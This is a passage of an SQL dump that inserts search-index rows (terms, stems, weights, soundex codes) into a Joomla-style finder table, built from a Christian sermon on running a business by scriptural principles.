(233524, 'in eternity', 'in eternity', 0, 1, 1.3667, 'I53653', 3, '*'),
(233557, 'judged', 'judg', 0, 0, 0.4, 'J323', 2, '*'),
(233597, 'master\'s', 'master', 0, 0, 0.5333, 'M2362', 3, '*'),
(233630, 'now in', 'now in', 0, 1, 1.2, 'N000', 2, '*'),
(233632, 'obedient', 'obedi', 0, 0, 0.5333, 'O1353', 4, '*'),
(233715, 'stand before', 'stand before', 0, 1, 1.4, 'S35316', 4, '*'),
(233747, 'the master\'s', 'the master', 0, 1, 1.4, 'T52362', 3, '*'),
(233831, 'when you stand', 'when you stand', 0, 1, 1.4667, 'W52353', 2, '*'),
(233851, 'you stand before', 'you stand before', 0, 1, 1.5333, 'Y235316', 2, '*'),
(235476, 'comes up', 'come up', 0, 1, 1.2667, 'C521', 2, '*'),
(235617, 'him never', 'him never', 0, 1, 1.3, 'H516', 3, '*'),
(235745, 'respected', 'respect', 0, 0, 0.6, 'R2123', 3, '*'),
(235764, 'so much', 'so much', 0, 1, 1.2333, 'S520', 2, '*'),
(235766, 'sons', 'son', 0, 0, 0.2667, 'S520', 5, '*'),
(236497, 'circumstances', 'circumst', 0, 0, 0.8667, 'C6252352', 4, '*'),
(236709, 'make up', 'make up', 0, 1, 1.2333, 'M210', 4, '*'),
(236710, 'make up your', 'make up your', 0, 1, 1.4, 'M216', 4, '*'),
(236730, 'mind to', 'mind to', 0, 1, 1.2333, 'M300', 5, '*'),
(237000, 'up your mind', 'up your mind', 0, 1, 1.4, 'U1653', 4, '*'),
(237054, 'your mind to', 'your mind to', 0, 1, 1.4, 'Y653', 5, '*'),
(238075, '1 divine', '1 divine', 0, 1, 1.2667, 'D150', 1, '*'),
(238076, '1 divine idea', '1 divine idea', 0, 1, 1.4333, 'D153', 1, '*'),
(238077, '1-2 leviticus', '1-2 leviticus', 0, 1, 1.4333, 'L132', 1, '*'),
(238078, '1-2 leviticus 27', '1-2 leviticus 27', 0, 1, 1.5333, 'L132', 1, '*'),
(238079, '10 22 deuteronomy', '10 22 deuteronomy', 0, 1, 1.5667, 'D650', 1, '*'),
(238080, '10 fulfill', '10 fulfill', 0, 1, 1.3333, 'F414', 1, '*'),
(238081, '10 fulfill all', '10 fulfill all', 0, 1, 1.4667, 'F414', 1, '*'),
(238082, '11 be', '11 be', 0, 1, 1.1667, 'B000', 1, '*'),
(238083, '11 be prayerful', '11 be prayerful', 0, 1, 1.5, 'B614', 1, '*'),
(238084, '12 business', '12 business', 0, 1, 1.3667, 'B252', 1, '*'),
(238085, '2 sow', '2 sow', 0, 1, 1.1667, 'S000', 1, '*'),
(238086, '2 sow a', '2 sow a', 0, 1, 1.2333, 'S000', 1, '*'),
(238087, '22 deuteronomy', '22 deuteronomy', 0, 1, 1.4667, 'D650', 1, '*'),
(238088, '22 deuteronomy 28', '22 deuteronomy 28', 0, 1, 1.5667, 'D650', 1, '*'),
(238089, '26 1-2', '26 1-2', 0, 1, 1.2, '', 1, '*'),
(238090, '26 1-2 leviticus', '26 1-2 leviticus', 0, 1, 1.5333, 'L132', 1, '*'),
(238091, '27 30', '27 30', 0, 1, 1.1667, '', 1, '*'),
(238092, '27 30 ii', '27 30 ii', 0, 1, 1.2667, 'I000', 1, '*'),
(238093, '28 8', '28 8', 0, 1, 1.1333, '', 1, '*'),
(238094, '28 8 26', '28 8 26', 0, 1, 1.2333, '', 1, '*'),
(238095, '3 9-10', '3 9-10', 0, 1, 1.2, '', 1, '*'),
(238096, '3 9-10 10', '3 9-10 10', 0, 1, 1.3, '', 1, '*'),
(238097, '3 take', '3 take', 0, 1, 1.2, 'T200', 1, '*'),
(238098, '3 take the', '3 take the', 0, 1, 1.3333, 'T230', 1, '*'),
(238099, '30 ii', '30 ii', 0, 1, 1.1667, 'I000', 1, '*'),
(238100, '30 ii chronicles', '30 ii chronicles', 0, 1, 1.5333, 'I265242', 1, '*'),
(238101, '31 5', '31 5', 0, 1, 1.1333, '', 1, '*'),
(238102, '31 5 introduction', '31 5 introduction', 0, 1, 1.5667, 'I5363235', 1, '*'),
(238103, '350', '350', 0, 0, 0.3, '', 1, '*'),
(238104, '350 naira', '350 naira', 0, 1, 1.3, 'N600', 1, '*'),
(238105, '350 naira what', '350 naira what', 0, 1, 1.4667, 'N630', 1, '*'),
(238106, '4 let', '4 let', 0, 1, 1.1667, 'L300', 1, '*'),
(238107, '4 let god', '4 let god', 0, 1, 1.3, 'L323', 1, '*'),
(238108, '5 introduction', '5 introduction', 0, 1, 1.4667, 'I5363235', 1, '*'),
(238109, '5 introduction god\'s', '5 introduction god', 0, 1, 1.6667, 'I5363235232', 1, '*'),
(238110, '5 press', '5 press', 0, 1, 1.2333, 'P620', 1, '*'),
(238111, '5 press further', '5 press further', 0, 1, 1.5, 'P621636', 1, '*'),
(238112, '6 partner', '6 partner', 0, 1, 1.3, 'P6356', 1, '*'),
(238113, '6 partner your', '6 partner your', 0, 1, 1.4667, 'P6356', 1, '*'),
(238114, '7 be', '7 be', 0, 1, 1.1333, 'B000', 1, '*'),
(238115, '7 be faithful', '7 be faithful', 0, 1, 1.4333, 'B314', 1, '*'),
(238116, '8 26', '8 26', 0, 1, 1.1333, '', 1, '*'),
(238117, '8 26 1-2', '8 26 1-2', 0, 1, 1.2667, '', 1, '*'),
(238118, '8 ensure', '8 ensure', 0, 1, 1.2667, 'E526', 1, '*'),
(238119, '8 ensure that', '8 ensure that', 0, 1, 1.4333, 'E5263', 1, '*'),
(238120, '9 do', '9 do', 0, 1, 1.1333, 'D000', 2, '*'),
(238121, '9 do not', '9 do not', 0, 1, 1.2667, 'D530', 2, '*'),
(238122, '9-10 10', '9-10 10', 0, 1, 1.2333, '', 1, '*'),
(238123, '9-10 10 22', '9-10 10 22', 0, 1, 1.3333, '', 1, '*'),
(238124, 'a business idea', 'a business idea', 0, 1, 1.5, 'A12523', 1, '*'),
(238125, 'a business scripturally', 'a business scripturally', 0, 1, 1.7667, 'A125261364', 1, '*'),
(238126, 'a certain percentage', 'a certain percentage', 0, 1, 1.6667, 'A2635162532', 1, '*'),
(238127, 'a commensurate', 'a commensurate', 0, 1, 1.4667, 'A25263', 1, '*'),
(238128, 'a commensurate take', 'a commensurate take', 0, 1, 1.6333, 'A252632', 1, '*'),
(238129, 'a direction', 'a direction', 0, 1, 1.3667, 'A36235', 1, '*'),
(238130, 'a direction that', 'a direction that', 0, 1, 1.5333, 'A362353', 1, '*'),
(238131, 'a divine', 'a divine', 0, 1, 1.2667, 'A315', 4, '*'),
(238132, 'a divine idea', 'a divine idea', 0, 1, 1.4333, 'A3153', 1, '*'),
(238133, 'a faithful tither', 'a faithful tither', 0, 1, 1.5667, 'A131436', 1, '*'),
(238134, 'a global', 'a global', 0, 1, 1.2667, 'A2414', 1, '*'),
(238135, 'a global mindset', 'a global mindset', 0, 1, 1.5333, 'A24145323', 1, '*'),
(238136, 'a higher', 'a higher', 0, 1, 1.2667, 'A260', 1, '*'),
(238137, 'a higher covenant', 'a higher covenant', 0, 1, 1.5667, 'A262153', 1, '*'),
(238138, 'a it', 'a it', 0, 1, 1.1333, 'A300', 1, '*'),
(238139, 'a it will', 'a it will', 0, 1, 1.3, 'A340', 1, '*'),
(238140, 'a kingdom', 'a kingdom', 0, 1, 1.3, 'A25235', 1, '*'),
(238141, 'a kingdom system', 'a kingdom system', 0, 1, 1.5333, 'A25235235', 1, '*'),
(238142, 'a limiting', 'a limiting', 0, 1, 1.3333, 'A45352', 1, '*'),
(238143, 'a limiting line', 'a limiting line', 0, 1, 1.5, 'A4535245', 1, '*'),
(238144, 'a mediocre', 'a mediocre', 0, 1, 1.3333, 'A5326', 1, '*'),
(238145, 'a mediocre level', 'a mediocre level', 0, 1, 1.5333, 'A5326414', 1, '*'),
(238146, 'a paying', 'a paying', 0, 1, 1.2667, 'A152', 1, '*'),
(238147, 'a paying job', 'a paying job', 0, 1, 1.4, 'A1521', 1, '*'),
(238148, 'a proper', 'a proper', 0, 1, 1.2667, 'A1616', 1, '*'),
(238149, 'a proper son', 'a proper son', 0, 1, 1.4, 'A161625', 1, '*'),
(238150, 'a proper understanding', 'a proper understanding', 0, 1, 1.7333, 'A1616536235352', 1, '*'),
(238151, 'a ripple', 'a ripple', 0, 1, 1.2667, 'A614', 1, '*'),
(238152, 'a ripple of', 'a ripple of', 0, 1, 1.3667, 'A6141', 1, '*'),
(238153, 'a salary', 'a salary', 0, 1, 1.2667, 'A246', 1, '*'),
(238154, 'a salary job', 'a salary job', 0, 1, 1.4, 'A24621', 1, '*'),
(238155, 'a salary scale', 'a salary scale', 0, 1, 1.4667, 'A24624', 1, '*'),
(238156, 'a transport', 'a transport', 0, 1, 1.3667, 'A3652163', 1, '*'),
(238157, 'a transport company', 'a transport company', 0, 1, 1.6333, 'A36521632515', 1, '*'),
(238158, 'a way to', 'a way to', 0, 1, 1.2667, 'A300', 1, '*'),
(238159, 'a when', 'a when', 0, 1, 1.2, 'A500', 1, '*'),
(238160, 'a when god', 'a when god', 0, 1, 1.3333, 'A523', 1, '*'),
(238161, 'a word from', 'a word from', 0, 1, 1.3667, 'A63165', 1, '*'),
(238162, 'ablessing', 'abless', 0, 0, 0.6, 'A14252', 1, '*'),
(238163, 'ablessing in', 'abless in', 0, 1, 1.4, 'A142525', 1, '*'),
(238164, 'ablessing in the', 'abless in the', 0, 1, 1.5333, 'A1425253', 1, '*'),
(238165, 'about the business', 'about the business', 0, 1, 1.6, 'A131252', 1, '*'),
(238166, 'abundance 8', 'abund 8', 0, 1, 1.3667, 'A15352', 1, '*'),
(238167, 'abundance 8 ensure', 'abund 8 ensure', 0, 1, 1.6, 'A15352526', 1, '*'),
(238168, 'abundance that', 'abund that', 0, 1, 1.4667, 'A153523', 1, '*'),
(238169, 'abundance that is', 'abund that is', 0, 1, 1.5667, 'A1535232', 1, '*'),
(238170, 'activate the', 'activ the', 0, 1, 1.4, 'A2313', 1, '*'),
(238171, 'activate the covenant', 'activ the covenant', 0, 1, 1.7, 'A23132153', 1, '*'),
(238172, 'affairs', 'affair', 0, 0, 0.4667, 'A162', 4, '*'),
(238173, 'affairs 4', 'affair 4', 0, 1, 1.3, 'A162', 1, '*'),
(238174, 'affairs 4 let', 'affair 4 let', 0, 1, 1.4333, 'A16243', 1, '*'),
(238175, 'afford to joke', 'afford to joke', 0, 1, 1.4667, 'A1632', 1, '*'),
(238176, 'all forms', 'all forms', 0, 1, 1.3, 'A41652', 1, '*'),
(238177, 'all forms of', 'all forms of', 0, 1, 1.4, 'A416521', 1, '*'),
(238178, 'all necessary', 'all necessary', 0, 1, 1.4333, 'A4526', 1, '*'),
(238179, 'all necessary procedures', 'all necessary procedures', 0, 1, 1.8, 'A4526162362', 1, '*'),
(238180, 'all righteousness', 'all righteousness', 0, 1, 1.5667, 'A4623252', 1, '*'),
(238181, 'all righteousness follow', 'all righteousness follow', 0, 1, 1.8, 'A462325214', 1, '*'),
(238182, 'all the money', 'all the money', 0, 1, 1.4333, 'A435', 1, '*'),
(238183, 'allow or', 'allow or', 0, 1, 1.2667, 'A460', 1, '*'),
(238184, 'allow or give', 'allow or give', 0, 1, 1.4333, 'A4621', 1, '*'),
(238185, 'along receive', 'along receive', 0, 1, 1.4333, 'A452621', 1, '*'),
(238186, 'along receive impartation', 'along receive impartation', 0, 1, 1.8333, 'A45262151635', 1, '*'),
(238187, 'also a', 'also a', 0, 1, 1.2, 'A420', 1, '*'),
(238188, 'also a way', 'also a way', 0, 1, 1.3333, 'A420', 1, '*'),
(238189, 'also press', 'also press', 0, 1, 1.3333, 'A42162', 1, '*'),
(238190, 'also press further', 'also press further', 0, 1, 1.6, 'A421621636', 1, '*'),
(238191, 'always ablessing', 'alwai ablessing', 0, 1, 1.5333, 'A4214252', 1, '*'),
(238192, 'always ablessing in', 'alwai ablessing in', 0, 1, 1.6333, 'A42142525', 1, '*'),
(238193, 'always crucial', 'alwai crucial', 0, 1, 1.4667, 'A42624', 1, '*'),
(238194, 'always crucial you', 'alwai crucial you', 0, 1, 1.6, 'A42624', 1, '*'),
(238195, 'always draw', 'alwai draw', 0, 1, 1.3667, 'A4236', 1, '*'),
(238196, 'always draw divine', 'alwai draw divine', 0, 1, 1.6, 'A4236315', 1, '*'),
(238197, 'always honor', 'alwai honor', 0, 1, 1.4, 'A4256', 1, '*'),
(238198, 'always honor the', 'alwai honor the', 0, 1, 1.5333, 'A42563', 1, '*'),
(238199, 'always secure', 'alwai secure', 0, 1, 1.4333, 'A426', 1, '*'),
(238200, 'always secure the', 'alwai secure the', 0, 1, 1.5667, 'A4263', 1, '*'),
(238201, 'always set', 'alwai set', 0, 1, 1.3333, 'A423', 1, '*'),
(238202, 'always set aside', 'alwai set aside', 0, 1, 1.5333, 'A42323', 1, '*'),
(238203, 'an idea', 'an idea', 0, 1, 1.2333, 'A530', 1, '*'),
(238204, 'an idea from', 'an idea from', 0, 1, 1.4, 'A53165', 1, '*'),
(238205, 'an idea he', 'an idea he', 0, 1, 1.3333, 'A530', 1, '*'),
(238206, 'and be sure', 'and be sure', 0, 1, 1.3667, 'A53126', 1, '*'),
(238207, 'and be vigilant', 'and be vigilant', 0, 1, 1.5, 'A5312453', 1, '*'),
(238208, 'and details', 'and details', 0, 1, 1.3667, 'A5342', 1, '*'),
(238209, 'and details from', 'and details from', 0, 1, 1.5333, 'A5342165', 1, '*'),
(238210, 'and dimension', 'and dimension', 0, 1, 1.4333, 'A53525', 1, '*'),
(238211, 'and dimension for', 'and dimension for', 0, 1, 1.5667, 'A5352516', 1, '*'),
(238212, 'and directs', 'and directs', 0, 1, 1.3667, 'A536232', 1, '*'),
(238213, 'and directs it', 'and directs it', 0, 1, 1.4667, 'A5362323', 1, '*'),
(238214, 'and do', 'and do', 0, 1, 1.2, 'A530', 2, '*'),
(238215, 'and do business', 'and do business', 0, 1, 1.5, 'A531252', 1, '*'),
(238216, 'and don\'t cheat', 'and don cheat', 0, 1, 1.5, 'A535323', 1, '*'),
(238217, 'and error', 'and error', 0, 1, 1.3, 'A536', 1, '*'),
(238218, 'and error and', 'and error and', 0, 1, 1.4333, 'A53653', 1, '*'),
(238219, 'and even sometimes', 'and even sometimes', 0, 1, 1.6, 'A531525352', 1, '*'),
(238220, 'and function', 'and function', 0, 1, 1.4, 'A5315235', 1, '*'),
(238221, 'and function at', 'and function at', 0, 1, 1.5, 'A53152353', 1, '*'),
(238222, 'and harvest', 'and harvest', 0, 1, 1.3667, 'A536123', 1, '*'),
(238223, 'and harvest how', 'and harvest how', 0, 1, 1.5, 'A536123', 1, '*'),
(238224, 'and kingdom', 'and kingdom', 0, 1, 1.3667, 'A5325235', 1, '*'),
(238225, 'and kingdom standards', 'and kingdom standards', 0, 1, 1.7, 'A53252352353632', 1, '*'),
(238226, 'and let god', 'and let god', 0, 1, 1.3667, 'A534323', 1, '*'),
(238227, 'and not borrow', 'and not borrow', 0, 1, 1.4667, 'A535316', 1, '*'),
(238228, 'and not one', 'and not one', 0, 1, 1.3667, 'A53535', 1, '*'),
(238229, 'and of what', 'and of what', 0, 1, 1.3667, 'A5313', 1, '*'),
(238230, 'and particularly', 'and particularly', 0, 1, 1.5333, 'A531632464', 1, '*'),
(238231, 'and particularly the', 'and particularly the', 0, 1, 1.6667, 'A5316324643', 1, '*'),
(238232, 'and processes', 'and processes', 0, 1, 1.4333, 'A53162', 1, '*'),
(238233, 'and processes that', 'and processes that', 0, 1, 1.6, 'A531623', 1, '*'),
(238234, 'and regular', 'and regular', 0, 1, 1.3667, 'A536246', 1, '*'),
(238235, 'and regular it', 'and regular it', 0, 1, 1.4667, 'A5362463', 1, '*'),
(238236, 'and say and', 'and say and', 0, 1, 1.3667, 'A53253', 1, '*'),
(238237, 'and stronger', 'and stronger', 0, 1, 1.4, 'A53236526', 1, '*'),
(238238, 'and stronger you', 'and stronger you', 0, 1, 1.5333, 'A53236526', 1, '*'),
(238239, 'and take lightly', 'and take lightly', 0, 1, 1.5333, 'A5324234', 1, '*'),
(238240, 'and the vision', 'and the vision', 0, 1, 1.4667, 'A53125', 1, '*'),
(238241, 'and thus', 'and thus', 0, 1, 1.2667, 'A532', 1, '*'),
(238242, 'and thus make', 'and thus make', 0, 1, 1.4333, 'A53252', 1, '*'),
(238243, 'and wholesales', 'and wholesales', 0, 1, 1.4667, 'A534242', 1, '*'),
(238244, 'and wholesales supply', 'and wholesales supply', 0, 1, 1.7, 'A53424214', 1, '*'),
(238245, 'and you are', 'and you are', 0, 1, 1.3667, 'A536', 4, '*'),
(238246, 'and your starting', 'and your starting', 0, 1, 1.5667, 'A536236352', 1, '*'),
(238247, 'anointing along', 'anoint along', 0, 1, 1.5, 'A5352452', 1, '*'),
(238248, 'anointing along receive', 'anoint along receive', 0, 1, 1.7667, 'A5352452621', 1, '*'),
(238249, 'anointing and the', 'anoint and the', 0, 1, 1.5667, 'A535253', 1, '*'),
(238250, 'anointing will', 'anoint will', 0, 1, 1.4667, 'A53524', 1, '*'),
(238251, 'anointing will always', 'anoint will always', 0, 1, 1.7, 'A535242', 1, '*'),
(238252, 'anointing will flow', 'anoint will flow', 0, 1, 1.6333, 'A5352414', 1, '*'),
(238253, 'any business', 'ani business', 0, 1, 1.4, 'A51252', 1, '*'),
(238254, 'any business idea', 'ani business idea', 0, 1, 1.5667, 'A512523', 1, '*'),
(238255, 'are a faithful', 'ar a faithful', 0, 1, 1.4667, 'A61314', 1, '*'),
(238256, 'are a proper', 'ar a proper', 0, 1, 1.4, 'A61616', 1, '*'),
(238257, 'are due', 'ar due', 0, 1, 1.2333, 'A630', 1, '*'),
(238258, 'are due upon', 'ar due upon', 0, 1, 1.4, 'A6315', 1, '*'),
(238259, 'are executing', 'ar executing', 0, 1, 1.4333, 'A62352', 1, '*'),
(238260, 'are executing do', 'ar executing do', 0, 1, 1.5333, 'A623523', 1, '*'),
(238261, 'are standing', 'ar standing', 0, 1, 1.4, 'A6235352', 1, '*'),
(238262, 'are standing upon', 'ar standing upon', 0, 1, 1.5667, 'A623535215', 1, '*'),
(238263, 'are the staff', 'ar the staff', 0, 1, 1.4333, 'A63231', 1, '*'),
(238264, 'are the things', 'ar the things', 0, 1, 1.4667, 'A6352', 1, '*'),
(238265, 'are the work', 'ar the work', 0, 1, 1.4, 'A6362', 1, '*'),
(238266, 'are three things', 'ar three things', 0, 1, 1.5333, 'A636352', 1, '*'),
(238267, 'are working', 'ar working', 0, 1, 1.3667, 'A6252', 2, '*'),
(238268, 'are working a', 'ar working a', 0, 1, 1.4333, 'A6252', 1, '*'),
(238269, 'as a faithful', 'as a faithful', 0, 1, 1.4333, 'A21314', 1, '*'),
(238270, 'as the business', 'as the business', 0, 1, 1.5, 'A231252', 1, '*'),
(238271, 'aside', 'asid', 0, 0, 0.3333, 'A230', 1, '*'),
(238272, 'aside to', 'asid to', 0, 1, 1.2667, 'A230', 1, '*'),
(238273, 'aside to partner', 'asid to partner', 0, 1, 1.5333, 'A2316356', 1, '*'),
(238274, 'assume that', 'assum that', 0, 1, 1.3667, 'A253', 1, '*'),
(238275, 'assume that all', 'assum that all', 0, 1, 1.5, 'A2534', 1, '*'),
(238276, 'at a mediocre', 'at a mediocre', 0, 1, 1.4333, 'A35326', 1, '*'),
(238277, 'at the beginning', 'at the beginning', 0, 1, 1.5333, 'A31252', 1, '*'),
(238278, 'at the level', 'at the level', 0, 1, 1.4, 'A3414', 4, '*'),
(238279, 'at this level', 'at this level', 0, 1, 1.4333, 'A32414', 1, '*'),
(238280, 'attack be', 'attack be', 0, 1, 1.3, 'A321', 1, '*'),
(238281, 'attack be watchful', 'attack be watchful', 0, 1, 1.6, 'A3213214', 1, '*'),
(238282, 'attacks don\'t', 'attack don', 0, 1, 1.4333, 'A32353', 1, '*'),
(238283, 'attacks don\'t be', 'attack don be', 0, 1, 1.5333, 'A323531', 1, '*'),
(238284, 'available in', 'avail in', 0, 1, 1.4, 'A14145', 1, '*'),
(238285, 'available in god\'s', 'avail in god', 0, 1, 1.6, 'A14145232', 1, '*'),
(238286, 'away from god', 'awai from god', 0, 1, 1.4333, 'A16523', 1, '*'),
(238287, 'b every', 'b every', 0, 1, 1.2333, 'B600', 1, '*'),
(238288, 'b every idea', 'b every idea', 0, 1, 1.4, 'B630', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(238289, 'b ltensures', 'b ltensures', 0, 1, 1.3667, 'B435262', 1, '*'),
(238290, 'b ltensures increasing', 'b ltensures increasing', 0, 1, 1.7333, 'B435262526252', 1, '*'),
(238291, 'be a certain', 'be a certain', 0, 1, 1.4, 'B2635', 1, '*'),
(238292, 'be an idea', 'be an idea', 0, 1, 1.3333, 'B530', 1, '*'),
(238293, 'be at the', 'be at the', 0, 1, 1.3, 'B300', 1, '*'),
(238294, 'be blessed of', 'be blessed of', 0, 1, 1.4333, 'B4231', 1, '*'),
(238295, 'be careless such', 'be careless such', 0, 1, 1.5333, 'B2642', 1, '*'),
(238296, 'be employers', 'be employers', 0, 1, 1.4, 'B51462', 1, '*'),
(238297, 'be employers of', 'be employers of', 0, 1, 1.5, 'B514621', 1, '*'),
(238298, 'be faithful', 'be faithful', 0, 1, 1.3667, 'B314', 1, '*'),
(238299, 'be faithful with', 'be faithful with', 0, 1, 1.5333, 'B3143', 1, '*'),
(238300, 'be more prayerful', 'be more prayerful', 0, 1, 1.5667, 'B561614', 1, '*'),
(238301, 'be prayerful', 'be prayerful', 0, 1, 1.4, 'B614', 1, '*'),
(238302, 'be prayerful and', 'be prayerful and', 0, 1, 1.5333, 'B61453', 1, '*'),
(238303, 'be sure it', 'be sure it', 0, 1, 1.3333, 'B263', 1, '*'),
(238304, 'be sure you', 'be sure you', 0, 1, 1.3667, 'B260', 1, '*'),
(238305, 'be the owner', 'be the owner', 0, 1, 1.4, 'B356', 1, '*'),
(238306, 'be the scriptural', 'be the scriptural', 0, 1, 1.5667, 'B3261364', 1, '*'),
(238307, 'be thoroughly', 'be thoroughly', 0, 1, 1.4333, 'B3624', 1, '*'),
(238308, 'be thoroughly prepared', 'be thoroughly prepared', 0, 1, 1.7333, 'B362416163', 1, '*'),
(238309, 'be vigilant', 'be vigilant', 0, 1, 1.3667, 'B2453', 1, '*'),
(238310, 'be vigilant do', 'be vigilant do', 0, 1, 1.4667, 'B2453', 1, '*'),
(238311, 'be watchful', 'be watchful', 0, 1, 1.3667, 'B3214', 1, '*'),
(238312, 'be watchful don\'t', 'be watchful don', 0, 1, 1.5667, 'B3214353', 1, '*'),
(238313, 'because that', 'becaus that', 0, 1, 1.4, 'B230', 2, '*'),
(238314, 'because that is', 'becaus that is', 0, 1, 1.5, 'B232', 1, '*'),
(238315, 'because the wider', 'becaus the wider', 0, 1, 1.5667, 'B236', 1, '*'),
(238316, 'become when', 'becom when', 0, 1, 1.3667, 'B250', 1, '*'),
(238317, 'become when you', 'becom when you', 0, 1, 1.5, 'B250', 1, '*'),
(238318, 'before you start', 'befor you start', 0, 1, 1.5333, 'B62363', 1, '*'),
(238319, 'begin to enjoy', 'begin to enjoy', 0, 1, 1.4667, 'B25352', 1, '*'),
(238320, 'begin to find', 'begin to find', 0, 1, 1.4333, 'B253153', 1, '*'),
(238321, 'beginning of your', 'begin of your', 0, 1, 1.5667, 'B25216', 1, '*'),
(238322, 'big', 'big', 0, 0, 0.2, 'B200', 2, '*'),
(238323, 'big think', 'big think', 0, 1, 1.3, 'B2352', 1, '*'),
(238324, 'big think grand', 'big think grand', 0, 1, 1.5, 'B2352653', 1, '*'),
(238325, 'birth it', 'birth it', 0, 1, 1.2667, 'B630', 1, '*'),
(238326, 'birth it forth', 'birth it forth', 0, 1, 1.4667, 'B63163', 1, '*'),
(238327, 'blessed of god', 'bless of god', 0, 1, 1.4667, 'B423123', 1, '*'),
(238328, 'blessing upon', 'bless upon', 0, 1, 1.4333, 'B425215', 1, '*'),
(238329, 'blessing upon your', 'bless upon your', 0, 1, 1.6, 'B4252156', 1, '*'),
(238330, 'blessings of', 'bless of', 0, 1, 1.4, 'B42521', 1, '*'),
(238331, 'blessings of god', 'bless of god', 0, 1, 1.5333, 'B4252123', 1, '*'),
(238332, 'borrow', 'borrow', 0, 0, 0.4, 'B600', 1, '*'),
(238333, 'borrow they', 'borrow they', 0, 1, 1.3667, 'B630', 1, '*'),
(238334, 'borrow they will', 'borrow they will', 0, 1, 1.5333, 'B634', 1, '*'),
(238335, 'bring instructions', 'bring instructions', 0, 1, 1.6, 'B65252362352', 1, '*'),
(238336, 'bring instructions to', 'bring instructions to', 0, 1, 1.7, 'B652523623523', 1, '*'),
(238337, 'business 3', 'busi 3', 0, 1, 1.3333, 'B252', 1, '*'),
(238338, 'business 3 take', 'busi 3 take', 0, 1, 1.5, 'B25232', 1, '*'),
(238339, 'business 9', 'busi 9', 0, 1, 1.3333, 'B252', 1, '*'),
(238340, 'business 9 do', 'busi 9 do', 0, 1, 1.4333, 'B2523', 1, '*'),
(238341, 'business and', 'busi and', 0, 1, 1.4, 'B25253', 1, '*'),
(238342, 'business and be', 'busi and be', 0, 1, 1.5, 'B252531', 1, '*'),
(238343, 'business be', 'busi be', 0, 1, 1.3667, 'B2521', 1, '*'),
(238344, 'business be an', 'busi be an', 0, 1, 1.4667, 'B25215', 1, '*'),
(238345, 'business because', 'busi because', 0, 1, 1.5333, 'B25212', 1, '*'),
(238346, 'business because it', 'busi because it', 0, 1, 1.6333, 'B252123', 1, '*'),
(238347, 'business by', 'busi by', 0, 1, 1.3667, 'B2521', 1, '*'),
(238348, 'business by inspiration', 'busi by inspiration', 0, 1, 1.7667, 'B2521521635', 1, '*'),
(238349, 'business can', 'busi can', 0, 1, 1.4, 'B2525', 1, '*'),
(238350, 'business can become', 'busi can become', 0, 1, 1.6333, 'B2525125', 1, '*'),
(238351, 'business do', 'busi do', 0, 1, 1.3667, 'B2523', 1, '*'),
(238352, 'business do not', 'busi do not', 0, 1, 1.5, 'B252353', 1, '*'),
(238353, 'business don\'t', 'busi don', 0, 1, 1.4667, 'B252353', 1, '*'),
(238354, 'business don\'t cut', 'busi don cut', 0, 1, 1.6, 'B25235323', 1, '*'),
(238355, 'business grows', 'busi grows', 0, 1, 1.4667, 'B25262', 1, '*'),
(238356, 'business grows wider', 'busi grows wider', 0, 1, 1.6667, 'B2526236', 1, '*'),
(238357, 'business idea', 'busi idea', 0, 1, 1.4333, 'B2523', 1, '*'),
(238358, 'business idea because', 'busi idea because', 0, 1, 1.7, 'B252312', 1, '*'),
(238359, 'business idea on', 'busi idea on', 0, 1, 1.5333, 'B25235', 1, '*'),
(238360, 'business idea that', 'busi idea that', 0, 1, 1.6, 'B2523', 1, '*'),
(238361, 'business in the', 'busi in the', 0, 1, 1.5, 'B25253', 1, '*'),
(238362, 'business let', 'busi let', 0, 1, 1.4, 'B25243', 1, '*'),
(238363, 'business let god', 'busi let god', 0, 1, 1.5333, 'B2524323', 1, '*'),
(238364, 'business make', 'busi make', 0, 1, 1.4333, 'B25252', 1, '*'),
(238365, 'business make sure', 'busi make sure', 0, 1, 1.6, 'B252526', 1, '*'),
(238366, 'business name', 'busi name', 0, 1, 1.4333, 'B2525', 1, '*'),
(238367, 'business name your', 'busi name your', 0, 1, 1.6, 'B25256', 1, '*'),
(238368, 'business ordinarily', 'busi ordinarily', 0, 1, 1.6333, 'B25263564', 1, '*'),
(238369, 'business ordinarily that', 'busi ordinarily that', 0, 1, 1.8, 'B252635643', 1, '*'),
(238370, 'business partner', 'busi partner', 0, 1, 1.5333, 'B25216356', 1, '*'),
(238371, 'business partner with', 'busi partner with', 0, 1, 1.7, 'B252163563', 1, '*'),
(238372, 'business regularly', 'busi regularly', 0, 1, 1.6, 'B25262464', 1, '*'),
(238373, 'business regularly by', 'busi regularly by', 0, 1, 1.7, 'B252624641', 1, '*'),
(238374, 'business scripturally', 'busi scripturally', 0, 1, 1.7, 'B25261364', 1, '*'),
(238375, 'business scripturally that', 'busi scripturally that', 0, 1, 1.8667, 'B252613643', 1, '*'),
(238376, 'business separate', 'busi separate', 0, 1, 1.5667, 'B252163', 1, '*'),
(238377, 'business separate yourself', 'busi separate yourself', 0, 1, 1.8667, 'B2521636241', 1, '*'),
(238378, 'business take', 'busi take', 0, 1, 1.4333, 'B25232', 1, '*'),
(238379, 'business take you', 'busi take you', 0, 1, 1.5667, 'B25232', 1, '*'),
(238380, 'business the', 'busi the', 0, 1, 1.4, 'B2523', 1, '*'),
(238381, 'business the lord', 'busi the lord', 0, 1, 1.5667, 'B2523463', 1, '*'),
(238382, 'business the more', 'busi the more', 0, 1, 1.5667, 'B252356', 1, '*'),
(238383, 'business to', 'busi to', 0, 1, 1.3667, 'B2523', 1, '*'),
(238384, 'business to a', 'busi to a', 0, 1, 1.4333, 'B2523', 1, '*'),
(238385, 'business with', 'busi with', 0, 1, 1.4333, 'B2523', 1, '*'),
(238386, 'business with a', 'busi with a', 0, 1, 1.5, 'B2523', 1, '*'),
(238387, 'business with the', 'busi with the', 0, 1, 1.5667, 'B2523', 1, '*'),
(238388, 'business your', 'busi your', 0, 1, 1.4333, 'B2526', 1, '*'),
(238389, 'business your first', 'busi your first', 0, 1, 1.6333, 'B25261623', 1, '*'),
(238390, 'but may you', 'but may you', 0, 1, 1.3667, 'B350', 1, '*'),
(238391, 'butter', 'butter', 0, 0, 0.4, 'B360', 1, '*'),
(238392, 'butter groundnut', 'butter groundnut', 0, 1, 1.5333, 'B36265353', 1, '*'),
(238393, 'butter groundnut spread', 'butter groundnut spread', 0, 1, 1.7667, 'B362653532163', 1, '*'),
(238394, 'by environmental', 'by environmental', 0, 1, 1.5333, 'B516534', 1, '*'),
